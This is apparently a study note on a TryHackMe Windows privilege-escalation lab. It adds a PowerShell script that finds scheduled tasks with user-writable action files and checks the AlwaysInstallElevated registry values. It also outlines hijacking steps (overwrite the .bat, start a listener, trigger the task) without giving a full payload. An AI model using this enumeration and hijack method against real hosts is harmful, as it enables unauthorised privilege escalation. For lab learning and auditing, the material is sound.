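The scheduled-task check the video does by hand (schtasks /query to find the Task To Run path, then icacls on that path) as an added PowerShell example; this is not the video's or TryHackMe's code. It walks every task the current user is allowed to read, normalises each action's target path, and reports the ones that the current user or one of its groups (BUILTIN\Users in the video's case) may write to, together with the account the task runs as and its triggers, so the vulntask case is found without already knowing the name. The second function queries the two registry values that I assume the "always stay elevated" section refers to (AlwaysInstallElevated under the HKLM and HKCU Installer policy keys); the video itself only says "two registry values", so that mapping is my assumption. The task name vulntask and the path C:\tasks\schtask.bat are used only as a worked illustration.

```powershell
# Added example (not from the video or the TryHackMe room).
# Requires the built-in ScheduledTasks module (Windows 8 / Server 2012 and later).

function ConvertTo-Sid {
    # Returns the SID string for an ACE's identity, or $null when it cannot be
    # resolved (deleted accounts, capability SIDs); unresolved entries never match.
    param([System.Security.Principal.IdentityReference]$Ref)
    try { $Ref.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $null }
}

function Get-WritableTaskActions {
    [CmdletBinding()]
    param()

    # SIDs of the current user and every group it belongs to (BUILTIN\Users, ...).
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids   = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

    # Any ACE granting WriteData lets us change the file's contents (Write, Modify
    # and FullControl all include it). GENERIC_ALL / GENERIC_WRITE bits show up as
    # raw numbers in some inherited ACEs, so they are folded into the mask too.
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]::WriteData -bor 0x10000000 -bor 0x40000000

    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute

            # Strip quotes and expand %SystemRoot%-style variables; relative names
            # such as "cmd.exe" are skipped rather than guessed from PATH.
            $path = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }

            try { $acl = Get-Acl -LiteralPath $path } catch { continue }

            # ACEs that (a) carry a write right and (b) apply to one of our SIDs.
            $matching = $acl.Access | Where-Object {
                (([int]$_.FileSystemRights -band $writeMask) -ne 0) -and
                ((ConvertTo-Sid $_.IdentityReference) -in $mySids)
            }
            $denied = $matching | Where-Object { $_.AccessControlType -eq 'Deny' }
            $grant  = $matching | Where-Object { $_.AccessControlType -eq 'Allow' }
            if ($denied -or -not $grant) { continue }   # a matching Deny wins

            [pscustomobject]@{
                TaskName    = $task.TaskName
                TaskPath    = $task.TaskPath
                RunAsUser   = $task.Principal.UserId
                RunLevel    = $task.Principal.RunLevel
                Triggers    = ($task.Triggers | ForEach-Object {
                                  $_.CimClass.CimClassName -replace '^MSFT_Task(\w+)Trigger$', '$1'
                              }) -join ','
                Execute     = $path
                Arguments   = $action.Arguments
                WritableVia = ($grant.IdentityReference -join ',')
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # Assumption: the video's "two registry values" are these. The MSI trick only
    # works when BOTH are 1; the function reports each key's current value.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $k; AlwaysInstallElevated = $v }
    }
}

# Usage: tasks we could hijack, those running with highest privilege first,
# followed by the AlwaysInstallElevated state.
Get-WritableTaskActions |
    Sort-Object RunLevel -Descending |
    Format-Table TaskName, RunAsUser, RunLevel, Triggers, Execute, WritableVia -AutoSize
Test-AlwaysInstallElevated | Format-Table -AutoSize
```

A row like TaskName vulntask, RunAsUser taskusr1, Triggers Boot, Execute C:\tasks\schtask.bat, WritableVia BUILTIN\Users is exactly the video's finding; from there the steps are the same as in the video (overwrite the .bat, start the listener, schtasks /run /tn vulntask if the current user may start the task, otherwise wait for the trigger). Two caveats a practitioner should keep in mind: Get-ScheduledTask only returns tasks the current user has permission to read, so an empty result does not prove the host is clean; and a writable action that runs as the current user gives persistence, not elevation, which is why RunAsUser is in the output.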